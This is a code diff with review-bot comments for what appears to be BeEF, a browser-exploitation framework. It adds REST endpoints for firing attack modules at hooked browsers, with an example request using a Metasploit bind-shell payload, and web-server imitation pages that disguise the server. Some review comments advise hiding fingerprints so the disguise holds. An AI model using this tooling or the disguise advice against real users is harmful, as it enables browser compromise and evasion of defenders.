'category' => config.get("beef.module.#{modk}.category")
}
i+=1
end
mods_hash.to_json
end
# @note Get the module definition (info, options)
get '/:mod_id' do
cmd = BeEF::Core::Models::CommandModule.get(params[:mod_id])
error 404 unless cmd != nil
modk = BeEF::Module.get_key_by_database_id(params[:mod_id])
error 404 unless modk != nil
#todo check if it's possible to also retrieve the TARGETS supported
{
'name' => cmd.name,
'description' => config.get("beef.module.#{cmd.name}.description"),
'category'=> config.get("beef.module.#{cmd.name}.category"),
'options' => BeEF::Module.get_options(modk) #todo => get also payload options..get_payload_options(modk,text)
}.to_json
end
# @note Get the module result for the specific executed command
#
# Example with the Alert Dialog
#GET /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/86/1?token=0a931a461d08b86bfee40df987aad7e9cfdeb050 HTTP/1.1
#Host: 127.0.0.1:3000
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#
#{"date":"1331637093","data":"{\"data\":\"text=michele\"}"}
get '/:session/:mod_id/:cmd_id' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
cmd = BeEF::Core::Models::Command.first(:hooked_browser_id => hb.id,
:command_module_id => params[:mod_id], :id => params[:cmd_id])
error 404 unless cmd != nil
result = BeEF::Core::Models::Result.first(:hooked_browser_id => hb.id, :command_id => cmd.id)
error 404 unless result != nil
{
'date' => result.date,
'data' => result.data
}.to_json
end
# @note Fire a new command module to the specified hooked browser.
# Return the command_id of the executed module if it has been fired correctly.
# Input must be specified in JSON format
#
# +++ Example with the Alert Dialog: +++
#POST /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/86?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1
#Host: 127.0.0.1:3000
#Content-Type: application/json; charset=UTF-8
#Content-Length: 18
#
#{"text":"michele"}
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#Content-Length: 35
#
#{"success":"true","command_id":"1"}
#
# +++ Example with a Metasploit module (Adobe FlateDecode Stream Predictor 02 Integer Overflow) +++
# +++ note that in this case we cannot query BeEF/Metasploit if module execution was successful or not.
# +++ this is why there is "command_id":"not_available" in the response
#POST /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/236?token=83f13036060fd7d92440432dd9a9b5e5648f8d75 HTTP/1.1
#Host: 127.0.0.1:3000
#Content-Type: application/json; charset=UTF-8
#Content-Length: 81
#
#{"SRVPORT":"3992", "URIPATH":"77345345345dg", "PAYLOAD":"generic/shell_bind_tcp"}
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#Content-Length: 35
#
#{"success":"true","command_id":"not_available"}
post '/:session/:mod_id' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
modk = BeEF::Module.get_key_by_database_id(params[:mod_id])
error 404 unless modk != nil
request.body.rewind
begin
data = JSON.parse request.body.read
options = []
data.each{|k,v| options.push({'name' => k, 'value' => v})}
exec_results = BeEF::Module.execute(modk, params[:session], options)
exec_results != nil ? '{"success":"true","command_id":"'+exec_results.to_s+'"}' : '{"success":"false"}'
rescue Exception => e
print_error "Invalid JSON input for module '#{params[:mod_id]}'"
error 400 # Bad Request
end
end
end
end
end
end
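Review bot: in `get '/:mod_id'` the description and category are looked up with `config.get("beef.module.#{cmd.name}.description")`, keyed by the module's display name, while `get '/'` keys the same configuration by `modk` from `BeEF::Module.get_key_by_database_id`; unless name and key coincide these return nil, and `modk` is already computed two lines above, so use it. In `post '/:session/:mod_id'` the `rescue Exception => e` also wraps `BeEF::Module.execute`, so any failure inside module execution is reported as `Invalid JSON input for module`; rescue `JSON::ParserError` around the parse only and let execution errors surface on their own. Build the responses with `{'success' => true, 'command_id' => exec_results}.to_json` instead of string concatenation, which also fixes `"success":"true"` being a string. Route order is fine (`/:mod_id`, `/:session/:mod_id/:cmd_id` and `post '/:session/:mod_id'` differ in method or segment count), but the example requests embed `token=...` in the URL; if the token moves to a header the examples should follow.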


@@ -14,23 +14,17 @@
# limitations under the License.
#
module BeEF
module Core
module Models
module Core
module Router
class DynamicCommandInfo
include DataMapper::Resource
storage_names[:default] = 'core_dynamiccommandinfo'
property :id, Serial
property :name, Text, :lazy => false
property :description, Text, :lazy => false
property :targets, Text, :lazy => false
belongs_to :command_module
module RegisterRouterHandler
def self.mount_handler(server)
server.mount('/', BeEF::Core::Router::Router.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Router::RegisterRouterHandler, BeEF::API::Server, 'mount_handler')
end
end
end
end
end
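Review bot: this hunk swaps the DynamicCommandInfo DataMapper model for the Router registration, so the `core_dynamiccommandinfo` table is left orphaned in existing databases and its `belongs_to :command_module` relation disappears; check that CommandModule and the HookedBrowser model no longer reference it. Mounting `BeEF::Core::Router::Router.new` at `/` makes the base class's imitation root page and 404 page the answer for any unmatched path, which is the intent; `Sinatra::Base.new` returns the middleware-wrapped app rather than the bare instance, which is what `server.mount` needs.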

core/main/router/router.rb

@@ -0,0 +1,258 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Router
#@note This is the main Router parent class.
#@note All the HTTP handlers registered on BeEF will extend this class.
class Router < Sinatra::Base
config = BeEF::Core::Configuration.instance
configure do
set :show_exceptions, false
end
# @note Override default 404 HTTP response
not_found do
if config.get("beef.http.web_server_imitation.enable")
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
#response body
"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" +
"<html><head>" +
"<title>404 Not Found</title>" +
"</head><body>" +
"<h1>Not Found</h1>" +
"<p>The requested URL was not found on this server.</p>" +
"<hr>" +
"<address>Apache/2.2.3 (CentOS)</address>" +
"</body></html>"
when "iis"
#response body
"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">" +
"<HTML><HEAD><TITLE>The page cannot be found</TITLE>" +
"<META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=Windows-1252\">" +
"<STYLE type=\"text/css\">" +
" BODY { font: 8pt/12pt verdana } " +
" H1 { font: 13pt/15pt verdana }" +
" H2 { font: 8pt/12pt verdana }" +
" A:link { color: red }" +
" A:visited { color: maroon }" +
"</STYLE>" +
"</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>" +
"<h1>The page cannot be found</h1>" +
"The page you are looking for might have been removed, had its name changed, or is temporarily unavailable." +
"<hr>" +
"<p>Please try the following:</p>" +
"<ul>" +
"<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>" +
"<li>If you reached this page by clicking a link, contact" +
" the Web site administrator to alert them that the link is incorrectly formatted." +
"</li>" +
"<li>Click the <a href=\"javascript:history.back(1)\">Back</a> button to try another link.</li>" +
"</ul>" +
"<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>" +
"<hr>" +
"<p>Technical Information (for support personnel)</p>" +
"<ul>" +
"<li>Go to <a href=\"http://go.microsoft.com/fwlink/?linkid=8180\">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>" +
"<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr)," +
"and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>" +
"</ul>" +
"</TD></TR></TABLE></BODY></HTML>"
else
"Not Found."
end
else
"Not Found."
end
end
before do
# @note Override Server HTTP response header
if config.get("beef.http.web_server_imitation.enable")
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
headers "Server" => "Apache/2.2.3 (CentOS)",
"Content-Type" => "text/html"
when "iis"
headers "Server" => "Microsoft-IIS/6.0",
"X-Powered-By" => "ASP.NET",
"Content-Type" => "text/html"
else
print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
end
end
end
# @note Default root page
get "/" do
if config.get("beef.http.web_server_imitation.enable")
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
"<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.1//EN\" \"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd\">" +
"<head>" +
"<title>Apache HTTP Server Test Page powered by CentOS</title>" +
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />" +
"<style type=\"text/css\">" +
"body {" +
"background-color: #fff; " +
"color: #000;" +
"font-size: 0.9em;" +
"font-family: sans-serif,helvetica;" +
"margin: 0;" +
"padding: 0; " +
"} " +
":link { " +
"color: #0000FF; " +
"} " +
":visited { " +
"color: #0000FF; " +
"} " +
"a:hover { " +
"color: #3399FF; " +
"} " +
"h1 { " +
" text-align: center; " +
" margin: 0; " +
" padding: 0.6em 2em 0.4em; " +
" background-color: #3399FF;" +
" color: #ffffff; " +
" font-weight: normal; " +
" font-size: 1.75em; " +
" border-bottom: 2px solid #000; " +
"} " +
"h1 strong {" +
"font-weight: bold; " +
"} " +
"h2 { " +
" font-size: 1.1em;" +
"font-weight: bold; " +
"} " +
".content { " +
" padding: 1em 5em; " +
"} " +
".content-columns { " +
" /* Setting relative positioning allows for " +
" absolute positioning for sub-classes */ " +
" position: relative; " +
" padding-top: 1em; " +
"} " +
".content-column-left { " +
" /* Value for IE/Win; will be overwritten for other browsers */" +
" width: 47%; " +
" padding-right: 3%; " +
" float: left; " +
" padding-bottom: 2em; " +
"} " +
".content-column-right { " +
" /* Values for IE/Win; will be overwritten for other browsers */" +
" width: 47%; " +
" padding-left: 3%; " +
" float: left; " +
" padding-bottom: 2em; " +
"} " +
".content-columns>.content-column-left, .content-columns>.content-column-right {" +
" /* Non-IE/Win */" +
"} " +
"img { " +
" border: 2px solid #fff; " +
" padding: 2px; " +
" margin: 2px; " +
"} " +
"a:hover img { " +
" border: 2px solid #3399FF; " +
"} " +
"</style> " +
"</head> " +
"<body> " +
"<h1>Apache 2 Test Page<br><font size=\"-1\"><strong>powered by</font> CentOS</strong></h1>" +
"<div class=\"content\">" +"<div class=\"content-middle\">" +
"<p>This page is used to test the proper operation of the Apache HTTP server after it has been installed. If you can read this page it means that the Apache HTTP server installed at this site is working properly.</p>" +
"</div>" +
"<hr />" +
"<div class=\"content-columns\">" +
"<div class=\"content-column-left\"> " +
"<h2>If you are a member of the general public:</h2>" +
"<p>The fact that you are seeing this page indicates that the website you just visited is either experiencing problems or is undergoing routine maintenance.</p>" +
"<p>If you would like to let the administrators of this website know that you've seen this page instead of the page you expected, you should send them e-mail. In general, mail sent to the name \"webmaster\" and directed to the website's domain should reach the appropriate person.</p> " +
"<p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to \"webmaster@example.com\".</p>" +
"</div>" +
"<div class=\"content-column-right\">" +
"<h2>If you are the website administrator:</h2>" +
"<p>You may now add content to the directory <tt>/var/www/html/</tt>. Note that until you do so, people visiting your website will see this page and not your content. To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>" +
"<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers. Thanks for using Apache and CentOS!</p>" +
"<p><a href=\"http://httpd.apache.org/\"><img src=\"/ui/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"/ui/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
"</div>" +
"</div>" +
"</div>" +
" <div class=\"content\">" +
"<div class=\"content-middle\"><h2>About CentOS:</h2><b>The Community ENTerprise Operating System</b> (CentOS) is an Enterprise-class Linux Distribution derived from sources freely provided to the public by a prominent North American Enterprise Linux vendor. CentOS conforms fully with the upstream vendors redistribution policy and aims to be 100% binary compatible. (CentOS mainly changes packages to remove upstream vendor branding and artwork.) The CentOS Project is the organization that builds CentOS.</p>" +
"<p>For information on CentOS please visit the <a href=\"http://www.centos.org/\">CentOS website</a>.</p>" +
"<p><h2>Note:</h2><p>CentOS is an Operating System and it is used to power this website; however, the webserver is owned by the domain owner and not the CentOS Project. <b>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project.</b>" +
"<p>Unless this server is on the CentOS.org domain, the CentOS Project doesn't have anything to do with the content on this webserver or any e-mails that directed you to this site.</p> " +
"<p>For example, if this website is www.example.com, you would find the owner of the example.com domain at the following WHOIS server:</p>" +
"<p><a href=\"http://www.internic.net/whois.html\">http://www.internic.net/whois.html</a></p>" +
"</div>" +
"</div>" +
"</body>" +
"</html>"
when "iis"
"<html>" +
"<head>" +
"<meta HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=Windows-1252\">" +
"<title ID=titletext>Under Construction</title>" +
"</head>" +
"<body bgcolor=white>" +
"<table>" +
"<tr>" +
"<td ID=tableProps width=70 valign=top align=center>" +
"<img ID=pagerrorImg src=\"/ui/media/images/icons/pagerror.gif\" width=36 height=48>" +
"<td ID=tablePropsWidth width=400>" +
"<h1 ID=errortype style=\"font:14pt/16pt verdana; color:#4e4e4e\">" +
"<P ID=Comment1><!--Problem--><P ID=\"errorText\">Under Construction</h1>" +
"<P ID=Comment2><!--Probable causes:<--><P ID=\"errordesc\"><font style=\"font:9pt/12pt verdana; color:black\">" +
"The site you are trying to view does not currently have a default page. It may be in the process of being upgraded and configured." +
"<P ID=term1>Please try this site again later. If you still experience the problem, try contacting the Web site administrator." +
"<hr size=1 color=\"blue\">" +
"<P ID=message1>If you are the Web site administrator and feel you have received this message in error, please see &quot;Enabling and Disabling Dynamic Content&quot; in IIS Help." +
"<h5 ID=head1>To access IIS Help</h5>" +
"<ol>" +
"<li ID=bullet1>Click <b>Start</b>, and then click <b>Run</b>." +
"<li ID=bullet2>In the <b>Open</b> text box, type <b>inetmgr</b>. IIS Manager appears." +
"<li ID=bullet3>From the <b>Help</b> menu, click <b>Help Topics</b>." +
"<li ID=bullet4>Click <b>Internet Information Services</b>.</ol>" +
"</td>" +
"</tr>" +
"</table>" +
"</body>" +
"</html>"
else
""
end
end
end
end
end
end
end
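Review bot: the web-server imitation is only as convincing as the whole response, and two things in this file undermine it. The `before` filter sets `Server` and `Content-Type`, but the Rack::Protection middleware that Sinatra enables by default (the hook handler has to `disable :protection` precisely because of it) still adds `X-Frame-Options` and `X-XSS-Protection`, and the underlying Rack handler (WEBrick in particular) may emit its own `Server` header; none of these would come from an Apache/2.2.3 or Microsoft-IIS/6.0 box. Check a real response with `curl -I` and either disable protection at this level when imitation is on or accept the fingerprint. `config = BeEF::Core::Configuration.instance` is a class-body local captured by the `not_found`/`before`/`get` closures; it works, but every REST subclass redeclares it, so a class-level accessor would be cleaner. The message `"You have and error in beef.http.web_server_imitation.type!"` has a typo ("an error"), and because that branch only prints, a misconfigured type silently serves unbranded pages; fail loudly or fall back to one type explicitly.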


@@ -82,6 +82,9 @@ module BeEF
# Create http handler for the javascript hook file
self.mount("#{@configuration.get("beef.http.hook_file")}", BeEF::Core::Handlers::HookedBrowsers.new)
# Create handler for the initialization checks (Browser Details)
self.mount("/init", BeEF::Core::Handlers::BrowserDetails)
# Dynamically get the list of all the http handlers using the API and register them
BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'mount_handler', self)
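Review bot: `/init` is hard-coded here while the hook file path on the line above is read from `beef.http.hook_file`; expose it through configuration the same way so an operator who renames the hook file can also move the init endpoint. Note also the asymmetry on these two lines: `HookedBrowsers.new` mounts an instance, but `BrowserDetails` is mounted as a bare class, which only works if the class itself responds to `call`.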

View File

@@ -67,11 +67,6 @@ module BeEF
if class_symbol and class_symbol.respond_to?(:options)
return class_symbol.options
end
#TODO: do we really need to print this info? At then modules with no options are common,
# so I guess we shouldn't print this info even in debug mode
# else
# print_debug "Module '#{mod}', no options method defined"
# end
end
return []
end
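Review bot: dropping the commented-out `print_debug` branch is fine, but `return []` now silently covers both "module has no `options` method" and "class lookup failed"; a one-line comment above `return []` stating that modules without options are expected would stop the next reader from re-adding the debug print that the removed TODO argued against.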
@@ -434,22 +429,22 @@ module BeEF
# @param [String] mod module key
# @param [String] hbsession hooked browser session
# @param [Array] opts array of module execute options (see #get_options)
# @return [Boolean] whether or not the BeEF system executed the module
# @return [Fixnum] the command_id associated to the module execution when info is persisted. nil if there are errors.
# @note The return value of this function does not specify if the module was successful, only that it was executed within the framework
def self.execute(mod, hbsession, opts=[])
if not (self.is_present(mod) and self.is_enabled(mod))
print_error "Module not found '#{mod}'. Failed to execute module."
return false
return nil
end
if BeEF::API::Registrar.instance.matched?(BeEF::API::Module, 'override_execute', [mod, nil,nil])
BeEF::API::Registrar.instance.fire(BeEF::API::Module, 'override_execute', mod, hbsession,opts)
# @note We return true by default as we cannot determine the correct status if multiple API hooks have been called
return true
# @note We return not_nil by default as we cannot determine the correct status if multiple API hooks have been called
return 'not_available' # @note using metasploit, we cannot know if the module execution was successful or not
end
hb = BeEF::HBManager.get_by_session(hbsession)
if not hb
print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
return false
return nil
end
self.check_hard_load(mod)
command_module = self.get_definition(mod).new(mod)
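Review bot: the return contract of `execute` is now mixed: `nil` on error, a Fixnum command_id on success, and the String `'not_available'` from the `override_execute` branch. A caller that follows the new `@return [Fixnum]` tag and uses the value as an id will get a String for every Metasploit-backed module. Either document the sentinel in the `@return` tag or return a symbol and keep the nil-means-failure rule; the old `@return [Boolean]` line and the `@note` lines that describe returning `true` should go together with the `return true` they describe, if they are still present.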
@@ -457,12 +452,12 @@ module BeEF
command_module.pre_execute
end
h = self.merge_options(mod, [])
c = BeEF::Core::Models::Command.new(:data => self.merge_options(mod, opts).to_json,
c = BeEF::Core::Models::Command.create(:data => self.merge_options(mod, opts).to_json,
:hooked_browser_id => hb.id,
:command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
:creationdate => Time.new.to_i
).save
return true
)
return c.id
end
# Merges default module options with array of custom options
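Review bot: `h = self.merge_options(mod, [])` is assigned and never used in this hunk; drop it. `Command.create` returns the resource whether or not the save succeeded, so `c.id` is nil after a failed save, which does satisfy the new nil-on-error contract, but nothing is logged; add a `print_error` when `c.saved?` is false so a database failure is distinguishable from a missing module.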

View File

@@ -29,10 +29,9 @@ end
# Function used to print debug information
# @param [String] s String to be printed
# @note This function will only print messages if the debug flag is set to true
# @todo Once the console extension has been merged into the core, remove the extension checks.
def print_debug(s)
config = BeEF::Core::Configuration.instance
if config.get('beef.debug') || (BeEF::Extension.is_loaded('console') && BeEF::Extension::Console.verbose?)
if config.get('beef.debug') || BeEF::Core::Console::CommandLine.parse[:verbose]
puts Time.now.localtime.strftime("[%k:%M:%S]")+'[>]'.yellow+' '+s.to_s
end
end
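Review bot: `BeEF::Core::Console::CommandLine.parse[:verbose]` is now evaluated on every `print_debug` call, so unless `parse` memoizes its result the command line is re-parsed for each debug message; read the flag once into a module-level value. The `@todo` about removing the console-extension checks is done by this change and should be dropped from the doc comment if it is still there.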

View File

@@ -29,7 +29,7 @@ module API
# Get the browser detail from the database.
#
def get_browser_detail(key)
bd = BeEF::Extension::Initialization::Models::BrowserDetails
bd = BeEF::Core::Models::BrowserDetails
(print_error "@session_id is invalid";return) if not BeEF::Filters.is_valid_hook_session_id?(@session_id)
bd.get(@session_id, key)
end

View File

@@ -44,8 +44,10 @@ module API
beef_server.mount('/ui/media', Rack::File.new(media_dir))
# mount the favicon file
beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{configuration.get("beef.extension.admin_ui.favicon_dir")}/#{configuration.get("beef.extension.admin_ui.favicon_file_name")}"))
# mount the favicon file, if we're not imitating a web server.
if !configuration.get("beef.http.web_server_imitation.enable")
beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{configuration.get("beef.extension.admin_ui.favicon_dir")}/#{configuration.get("beef.extension.admin_ui.favicon_file_name")}"))
end
end
end
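Review bot: mounting `/favicon.ico` only when `beef.http.web_server_imitation.enable` is off is the right call: an unconditional favicon handler would have betrayed the BeEF server behind an imitated Apache or IIS page. The old comment `# mount the favicon file` duplicates the new one and should be removed.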

View File

@@ -17,9 +17,7 @@ beef:
extension:
admin_ui:
name: 'Admin UI'
enable: true
username: "beef"
password: "beef"
enable: true
favicon_file_name: "favicon.ico"
favicon_dir: "/images"
login_fail_delay: 1
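Review bot: removing `username`/`password` from `admin_ui` is only safe if the new `beef.credentials.user` and `beef.credentials.passwd` keys exist in the core config with matching defaults; otherwise authentication fails closed for everyone. Users with customised config files will have their old keys silently ignored, so the move needs a comment in the config. With the shipped defaults still the well-known `beef`/`beef` pair, a startup warning when those defaults are detected would be a useful addition here.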

View File

@@ -69,7 +69,7 @@ class Authentication < BeEF::Extension::AdminUI::HttpController
end
# check username and password
if not (username.eql? config.get('beef.extension.admin_ui.username') and password.eql? config.get('beef.extension.admin_ui.password') )
if not (username.eql? config.get('beef.credentials.user') and password.eql? config.get('beef.credentials.passwd') )
BeEF::Core::Logger.instance.register('Authentication', "User with ip #{@request.ip} has failed to authenticate in the application.")
return
end
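Review bot: this hunk must ship together with the YAML hunk that moves the credentials, or every login fails. `config.get` on a missing key yields nil and `username.eql? nil` is false, so the failure mode is closed, which is good. `eql?` is not a constant-time comparison; for an admin login the existing `login_fail_delay` is the more meaningful control, but a fixed-time compare would cost nothing here.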

View File

@@ -23,7 +23,7 @@ module Controllers
#
class Modules < BeEF::Extension::AdminUI::HttpController
BD = BeEF::Extension::Initialization::Models::BrowserDetails
BD = BeEF::Core::Models::BrowserDetails
def initialize
super({
@@ -208,36 +208,6 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal ip address
internal_ip = BD.get(zombie_session, 'InternalIP')
if not internal_ip.nil?
encoded_internal_ip = CGI.escapeHTML(internal_ip)
encoded_internal_ip_hash = { 'Internal IP' => encoded_internal_ip }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_ip_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal hostname
internal_hostname = BD.get(zombie_session, 'InternalHostname')
if not internal_hostname.nil?
encoded_internal_hostname = CGI.escapeHTML(internal_hostname)
encoded_internal_hostname_hash = { 'Internal Hostname' => encoded_internal_hostname }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_hostname_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the System Platform
system_platform = BD.get(zombie_session, 'SystemPlatform')
if not system_platform.nil?
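Review bot: removing the 'Internal IP' and 'Internal Hostname' rows takes these two BrowserDetails keys out of the summary grid entirely; both blocks were guarded by `if not ... nil?`, so they were harmless when the data was absent. If the values are now collected by a separate module and shown elsewhere, say so in a comment here, otherwise the summary loses data it used to display.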
@@ -636,7 +606,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
def2.push({'name' => k, 'value' => v})
}
# End hack
@body = (BeEF::Module.execute(mod_key, zombie_session, def2)) ? '{success: true}' : '{success: false}'
exec_results = BeEF::Module.execute(mod_key, zombie_session, def2)
@body = (exec_results != nil) ? '{success: true}' : '{success: false}'
end
# Re-execute an command_module to a zombie.
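Review bot: `exec_results != nil` reports `{success: true}` for the `'not_available'` string that `BeEF::Module.execute` returns when a Metasploit hook overrides execution, so the UI shows success for a module whose outcome is unknown; a third response state would be more honest. Adjacent but pre-existing: `'{success: true}'` is not strict JSON (unquoted key); building the body with `{'success' => true}.to_json` avoids relying on the ExtJS parser's leniency.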

View File

@@ -48,7 +48,7 @@
<%= nonce_tag %>
<div id="header">
<div class="right-menu">
<img src="/favicon.ico" alt="BeEF" title="BeEF" />
<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" />
BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> |
<a id='do-submit-bug-menu' href='https://github.com/beefproject/beef/issues/new' target='_blank'>Submit Bug</a> |
<a id='do-logout-menu' href='#'>Logout</a>

View File

@@ -85,9 +85,9 @@ class Panel < BeEF::Extension::AdminUI::HttpController
# create a hash of simple hooked browser details
def get_simple_hooked_browser_hash(hooked_browser)
browser_icon = BeEF::Extension::Initialization::Models::BrowserDetails.browser_icon(hooked_browser.session)
os_icon = BeEF::Extension::Initialization::Models::BrowserDetails.os_icon(hooked_browser.session)
domain = BeEF::Extension::Initialization::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
return {
'session' => hooked_browser.session,

View File

@@ -80,7 +80,7 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
)
xssrays_scan.save
print_info("[XSSRAYS] Starting XSSRays on HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
print_info("[XSSRAYS] Starting XSSRays [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
end
end
@@ -116,7 +116,7 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
)
xssrays_scan.save
print_info("[XSSRAYS] Starting XSSRays on HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
print_info("[XSSRAYS] Starting XSSRays [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
end
end
end
@@ -124,4 +124,4 @@ end
end
end
end
end
end

Binary file not shown.


Binary file not shown.


Binary file not shown.


View File

@@ -0,0 +1,77 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
HooksTab = function() {
/*
* The panel used to configure the hook.
********************************************/
var hooks_panel = new Ext.FormPanel({
title: 'Hooks',
id: 'hooks-panel',
hideLabels : false,
border: false,
padding: '3px 5px 0 5px',
items:[{
fieldLabel: 'Text',
xtype: 'textarea',
id: 'inputText',
name: 'inputText',
width: '100%',
height: '40%',
allowBlank: true
},{
fieldLabel: 'Result',
xtype: 'textarea',
id: 'resultText',
name: 'resultText',
width: '100%',
height: '40%',
allowBlank: true
}],
buttons: [{
text: 'Add Hook',
handler: function() {
var form = Ext.getCmp('hooks-panel').getForm();
var form_values = form.getValues();
var input_text = form_values['inputText'];
var result="";
form.setValues({resultText: result});
}
},{
text: 'Delete Hook',
handler: function() {
var form = Ext.getCmp('hooks-panel').getForm();
var form_values = form.getValues();
var input_text = form_values['inputText'];
var result="";
form.setValues({resultText: result});
}
}]
});
HooksTab.superclass.constructor.call(this, {
region: 'center',
items: [hooks_panel],
autoScroll: true,
border: false
});
};
Ext.extend(HooksTab,Ext.Panel, {});
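Review bot: both button handlers read `inputText` into `input_text` and then discard it, writing an empty string to `resultText`, so 'Add Hook' and 'Delete Hook' are no-ops. If this is a skeleton, mark each handler with a TODO and disable the buttons until the backend exists; the two identical bodies can also collapse into one function parameterised by the action name.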

View File

@@ -41,6 +41,7 @@ MainPanel = function(){
this.grid = new DataGrid('/ui/logs/all.json',30);
this.grid.border = false;
this.welcome_tab = new WelcomeTab;
//this.hooks_tab = new HooksTab;
//this.hackvertor_tab = new HackVertorTab;
MainPanel.superclass.constructor.call(this, {
@@ -71,7 +72,14 @@ MainPanel = function(){
items:[
this.grid
/*
]},{
]},{
id:'hooks-view',
layout:'border',
title:'Hooks',
hideMode:'offsets',
items:[
//this.hooks_tab
]},{
id:'hackvertor-view',
layout:'border',
title:'HackVertor',
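Review bot: the `/*` at the top of this hunk opens a block comment around the hooks and HackVertor views, and with the duplicated `]},{` lines it is hard to tell which bracket is live. Confirm that the matching `*/` below the hunk still closes the comment at the intended place and that the `items` array still parses with the grid as its last live element.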

View File

@@ -24,39 +24,8 @@ module Console
#
@short_name = @full_name = 'console'
@description = 'console environment to manage beef'
#
# Returns true of the verbose option has been enabled for the console.
# False if not.
#
# Example:
#
# $ ruby console.rb -v
# BeEF::Extension::Console.verbose? # => true
#
# $ ruby console.rb
# BeEF::Extension::Console.verbose? # => false
#
def self.verbose?
CommandLine.parse[:verbose]
end
#
# Returns true if we should reset the database. False if not.
#
# $ ruby console.rb -x
# BeEF::Extension::Console.resetdb? # => true
#
# $ ruby console.rb
# BeEF::Extension::Console.resetdb? # => false
#
def self.resetdb?
CommandLine.parse[:resetdb]
end
end
end
end
require 'extensions/console/banners'
require 'extensions/console/commandline'
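Review bot: `verbose?` and `resetdb?` are removed, so any caller still referencing `BeEF::Extension::Console.verbose?` or `.resetdb?` raises NoMethodError at runtime; grep the tree for both (print_debug and the Metasploit hooks are updated elsewhere in this series). The usage examples for `-v` and `-x` that lived in these doc comments should move to the new `CommandLine` location rather than disappear.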

View File

